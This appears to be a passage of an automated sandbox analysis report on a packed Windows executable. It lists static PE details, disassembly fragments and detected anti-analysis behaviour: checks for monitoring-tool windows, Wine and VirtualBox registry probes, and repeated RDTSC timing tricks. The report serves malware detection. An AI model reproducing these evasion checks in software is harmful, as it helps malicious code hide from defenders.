                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00699BB0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_00699BB0
                Source: initial sample Static PE information: section where entry point is pointing to: .taggant
                Source: file.exe Static PE information: real checksum: 0x215498 should be: 0x20f1cd
                Source: file.exe Static PE information: section name:
                Source: file.exe Static PE information: section name: .rsrc
                Source: file.exe Static PE information: section name: .idata
                Source: file.exe Static PE information: section name:
                Source: file.exe Static PE information: section name: fozyxqhw
                Source: file.exe Static PE information: section name: gnsdcfju
                Source: file.exe Static PE information: section name: .taggant
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00BC20AC push eax; mov dword ptr [esp], ebp 0_2_00BC2165
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00AED0FE push 4AA7AFC2h; mov dword ptr [esp], edi 0_2_00AED150
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00AED0FE push 27CE0C78h; mov dword ptr [esp], ecx 0_2_00AED17E
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00AC10CB push 6604EB85h; mov dword ptr [esp], eax 0_2_00AC10F0
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00AC10CB push 2A19899Eh; mov dword ptr [esp], ebx 0_2_00AC112A
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00AC10CB push 657E7F5Eh; mov dword ptr [esp], eax 0_2_00AC1138
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00AC10CB push edi; mov dword ptr [esp], esi 0_2_00AC1163
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00AC10CB push 463A6754h; mov dword ptr [esp], edx 0_2_00AC11CA
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00AC10CB push edx; mov dword ptr [esp], 3C1F67F5h 0_2_00AC11D0
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00DA2042 push edx; mov dword ptr [esp], eax 0_2_00DA20BD
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00DA2042 push edx; mov dword ptr [esp], 00001000h 0_2_00DA20CE
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00DA2042 push ecx; mov dword ptr [esp], ebx 0_2_00DA20DF
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00DA2042 push ebx; mov dword ptr [esp], 77F30161h 0_2_00DA20F8
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00DA2042 push edi; mov dword ptr [esp], 5FBD8444h 0_2_00DA211F
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00BF4022 push 7E246A93h; mov dword ptr [esp], ebp 0_2_00BF3F57
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00BAC005 push edi; mov dword ptr [esp], edx 0_2_00BAC6FF
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00BF3072 push 2679ED87h; mov dword ptr [esp], edx 0_2_00BF30A1
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00B5D068 push 633BB1C2h; mov dword ptr [esp], ecx 0_2_00B5D10C
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00B5D068 push ebp; mov dword ptr [esp], edi 0_2_00B5D125
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00BA7192 push eax; mov dword ptr [esp], esi 0_2_00BA71FD
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00B031F1 push eax; mov dword ptr [esp], ecx 0_2_00B0322C
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00B031F1 push 1E9AC6AAh; mov dword ptr [esp], edx 0_2_00B03279
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00DA21B7 push edi; mov dword ptr [esp], esp 0_2_00DA21C4
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00DA21B7 push ebx; mov dword ptr [esp], 7F9BAFF6h 0_2_00DA21D8
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00DA21B7 push eax; mov dword ptr [esp], ecx 0_2_00DA221B
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00DA21B7 push ecx; mov dword ptr [esp], 6F55E5AAh 0_2_00DA2225
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00A0613E push edi; mov dword ptr [esp], 199F7ED6h 0_2_00A061A3
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00A0613E push 7533DAF5h; mov dword ptr [esp], ecx 0_2_00A061BC
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00A5D17C push ebp; mov dword ptr [esp], esi 0_2_00A5D2C4
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00A5D17C push eax; mov dword ptr [esp], edx 0_2_00A5D2D0
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00B4E14B push 2D004818h; mov dword ptr [esp], ebx 0_2_00B4E171
                Source: file.exe Static PE information: section name: fozyxqhw entropy: 7.952608283646461

                Boot Survival

                barindex
                Source: C:\Users\user\Desktop\file.exe Window searched: window name: FilemonClass
                Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS
                Source: C:\Users\user\Desktop\file.exe Window searched: window name: RegmonClass

                Malware Analysis System Evasion

                barindex
                Source: C:\Users\user\Desktop\file.exe Evasive API call chain: GetUserDefaultLangID, ExitProcess graph_0-38006
                Source: C:\Users\user\Desktop\file.exe File opened: HKEY_CURRENT_USER\Software\Wine
                Source: C:\Users\user\Desktop\file.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AE7CB8 second address: AE7CCD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0AD8C6A9C1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AE7CCD second address: AE7CF2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0AD95F8838h 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a jnl 00007F0AD95F8826h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AE6DAE second address: AE6DB8 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F0AD8C6A9C2h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AE6DB8 second address: AE6DBE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AE6DBE second address: AE6DDF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F0AD8C6A9C8h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AE6DDF second address: AE6DE3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AE6DE3 second address: AE6DF9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jnp 00007F0AD8C6A9C2h 0x0000000e ja 00007F0AD8C6A9B6h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AE70EE second address: AE70F2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AE70F2 second address: AE7102 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jl 00007F0AD8C6A9BCh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AE7102 second address: AE7128 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 js 00007F0AD95F884Bh 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F0AD95F8839h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AE7569 second address: AE7575 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jng 00007F0AD8C6A9B6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AE7575 second address: AE757A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AE9CCD second address: AE9CD3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AE9CD3 second address: 96DB7E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 add dword ptr [esp], 30D845EBh 0x0000000d mov edx, dword ptr [ebp+122D2A29h] 0x00000013 push dword ptr [ebp+122D1595h] 0x00000019 mov si, cx 0x0000001c call dword ptr [ebp+122D3589h] 0x00000022 pushad 0x00000023 jng 00007F0AD95F882Ch 0x00000029 xor eax, eax 0x0000002b jmp 00007F0AD95F882Eh 0x00000030 add dword ptr [ebp+122D34B1h], ebx 0x00000036 mov edx, dword ptr [esp+28h] 0x0000003a or dword ptr [ebp+122D34B1h], ebx 0x00000040 add dword ptr [ebp+122D34B1h], edi 0x00000046 mov dword ptr [ebp+122D29C9h], eax 0x0000004c mov dword ptr [ebp+122D34B1h], edi 0x00000052 mov esi, 0000003Ch 0x00000057 mov dword ptr [ebp+122D2E75h], edx 0x0000005d add esi, dword ptr [esp+24h] 0x00000061 jg 00007F0AD95F8827h 0x00000067 lodsw 0x00000069 jmp 00007F0AD95F8832h 0x0000006e add eax, dword ptr [esp+24h] 0x00000072 jmp 00007F0AD95F882Eh 0x00000077 mov ebx, dword ptr [esp+24h] 0x0000007b mov dword ptr [ebp+122D34B1h], edi 0x00000081 push eax 0x00000082 pushad 0x00000083 push esi 0x00000084 push eax 0x00000085 push edx 0x00000086 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE9D01 second address: AE9D07 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE9D07 second address: AE9D53 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0AD95F8839h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c or ecx, dword ptr [ebp+122D2C21h] 0x00000012 push 00000000h 0x00000014 mov dx, di 0x00000017 call 00007F0AD95F8829h 0x0000001c jnp 00007F0AD95F8832h 0x00000022 push eax 0x00000023 pushad 0x00000024 push eax 0x00000025 push edx 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE9D53 second address: AE9D57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE9D57 second address: AE9DA1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 jmp 00007F0AD95F8837h 0x0000000c pop ebx 0x0000000d popad 0x0000000e mov eax, dword ptr [esp+04h] 0x00000012 push esi 0x00000013 push edi 0x00000014 push ebx 0x00000015 pop ebx 0x00000016 pop edi 0x00000017 pop esi 0x00000018 mov eax, dword ptr [eax] 0x0000001a jmp 00007F0AD95F8830h 0x0000001f mov dword ptr [esp+04h], eax 0x00000023 push eax 0x00000024 push edx 0x00000025 push eax 0x00000026 push edx 0x00000027 jns 00007F0AD95F8826h 0x0000002d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE9DA1 second address: AE9DBE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0AD8C6A9C9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE9DBE second address: AE9E47 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 pop eax 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop eax 0x0000000b mov esi, 72B4BA4Bh 0x00000010 mov dword ptr [ebp+122D37E6h], ecx 0x00000016 push 00000003h 0x00000018 push 00000000h 0x0000001a push ebx 0x0000001b call 00007F0AD95F8828h 0x00000020 pop ebx 0x00000021 mov dword ptr [esp+04h], ebx 0x00000025 add dword ptr [esp+04h], 0000001Ch 0x0000002d inc ebx 0x0000002e push ebx 0x0000002f ret 0x00000030 pop ebx 0x00000031 ret 0x00000032 je 00007F0AD95F882Ch 0x00000038 mov dword ptr [ebp+122D274Fh], edx 0x0000003e push 00000000h 0x00000040 or edi, dword ptr [ebp+122D2A5Dh] 0x00000046 push 00000003h 0x00000048 jmp 00007F0AD95F8837h 0x0000004d call 00007F0AD95F8829h 0x00000052 jmp 00007F0AD95F8831h 0x00000057 push eax 0x00000058 pushad 0x00000059 push eax 0x0000005a push edx 0x0000005b push eax 0x0000005c push edx 0x0000005d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE9E47 second address: AE9E4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE9E4B second address: AE9EA5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 pop eax 0x00000009 push esi 0x0000000a pop esi 0x0000000b popad 0x0000000c popad 0x0000000d mov eax, dword ptr [esp+04h] 0x00000011 pushad 0x00000012 jmp 00007F0AD95F882Fh 0x00000017 push edi 0x00000018 push edi 0x00000019 pop edi 0x0000001a pop edi 0x0000001b popad 0x0000001c mov eax, dword ptr [eax] 0x0000001e jno 00007F0AD95F8840h 0x00000024 mov dword ptr [esp+04h], eax 0x00000028 push eax 0x00000029 push edx 0x0000002a jo 00007F0AD95F882Ch 0x00000030 jg 00007F0AD95F8826h 0x00000036 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE9EA5 second address: AE9EAB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE9EAB second address: AE9EAF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE9EAF second address: AE9ED6 instructions: 0x00000000 rdtsc 0x00000002 je 00007F0AD8C6A9B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop eax 0x0000000d mov dword ptr [ebp+122D1B3Dh], ebx 0x00000013 lea ebx, dword ptr [ebp+1244FC0Ch] 0x00000019 add dword ptr [ebp+122D27BEh], edx 0x0000001f mov edi, edx 0x00000021 push eax 0x00000022 pushad 0x00000023 push eax 0x00000024 push edx 0x00000025 pushad 0x00000026 popad 0x00000027 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AEA089 second address: AEA08D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AEA08D second address: AEA091 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AEA19C second address: AEA1E9 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F0AD95F8826h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop esi 0x0000000b add dword ptr [esp], 22BA316Ah 0x00000012 push 00000000h 0x00000014 push esi 0x00000015 call 00007F0AD95F8828h 0x0000001a pop esi 0x0000001b mov dword ptr [esp+04h], esi 0x0000001f add dword ptr [esp+04h], 00000018h 0x00000027 inc esi 0x00000028 push esi 0x00000029 ret 0x0000002a pop esi 0x0000002b ret 0x0000002c mov cx, B331h 0x00000030 lea ebx, dword ptr [ebp+1244FC20h] 0x00000036 add edi, 067E2900h 0x0000003c push eax 0x0000003d push eax 0x0000003e push edx 0x0000003f jnp 00007F0AD95F8828h 0x00000045 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B0992B second address: B09931 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B09AA9 second address: B09ADA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F0AD95F8830h 0x0000000a jmp 00007F0AD95F8835h 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 pushad 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B09ADA second address: B09AF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 ja 00007F0AD8C6A9BEh 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B09AF2 second address: B09B02 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0AD95F882Ah 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B09EE9 second address: B09EED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B09EED second address: B09F0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F0AD95F8826h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jmp 00007F0AD95F8833h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B0A06F second address: B0A093 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0AD8C6A9BBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jns 00007F0AD8C6A9B6h 0x00000011 jmp 00007F0AD8C6A9BDh 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B0A1D5 second address: B0A1DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B0A1DB second address: B0A1DF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B0A1DF second address: B0A1E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B0A1E5 second address: B0A202 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F0AD8C6A9C5h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B0A202 second address: B0A24D instructions: 0x00000000 rdtsc 0x00000002 js 00007F0AD95F8826h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F0AD95F882Dh 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 jmp 00007F0AD95F882Ah 0x0000001a jmp 00007F0AD95F882Ch 0x0000001f popad 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007F0AD95F8833h 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B0A24D second address: B0A251 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B0A251 second address: B0A255 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B0A255 second address: B0A25B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B0A25B second address: B0A279 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push edi 0x00000004 pop edi 0x00000005 pop ebx 0x00000006 jo 00007F0AD95F883Ch 0x0000000c jmp 00007F0AD95F8830h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B0A3AE second address: B0A3D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F0AD8C6A9C5h 0x0000000b jmp 00007F0AD8C6A9BDh 0x00000010 popad 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B0A70D second address: B0A736 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0AD95F882Fh 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F0AD95F8836h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B0A898 second address: B0A8AB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push edx 0x0000000a pop edx 0x0000000b jl 00007F0AD8C6A9B6h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B0A8AB second address: B0A8BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0AD95F882Ch 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B0A8BC second address: B0A8D0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0AD8C6A9BEh 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B0A8D0 second address: B0A8D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B0A8D6 second address: B0A8DA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B0A8DA second address: B0A8E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B0B239 second address: B0B23D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B0B3C8 second address: B0B3DF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0AD95F8831h 0x00000007 push eax 0x00000008 push edx 0x00000009 push esi 0x0000000a pop esi 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B0B3DF second address: B0B3F1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0AD8C6A9BEh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B0B51D second address: B0B53D instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F0AD95F8826h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F0AD95F8836h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B0B53D second address: B0B55A instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push edi 0x00000004 pop edi 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F0AD8C6A9C5h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B0B86C second address: B0B870 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B165D0 second address: B16601 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0AD8C6A9BFh 0x00000007 jmp 00007F0AD8C6A9C0h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jmp 00007F0AD8C6A9BEh 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B168B7 second address: B168BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B16B33 second address: B16B47 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F0AD8C6A9B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jng 00007F0AD8C6A9B8h 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B16DCA second address: B16DE4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jbe 00007F0AD95F8826h 0x00000009 jnl 00007F0AD95F8826h 0x0000000f push esi 0x00000010 pop esi 0x00000011 popad 0x00000012 je 00007F0AD95F882Eh 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B16DE4 second address: B16DF8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jbe 00007F0AD8C6A9F1h 0x0000000e push eax 0x0000000f push edx 0x00000010 push esi 0x00000011 pop esi 0x00000012 push edi 0x00000013 pop edi 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B16DF8 second address: B16E0E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0AD95F882Ch 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B16E0E second address: B16E12 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B18F7D second address: B18F87 instructions: 0x00000000 rdtsc 0x00000002 je 00007F0AD95F8826h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
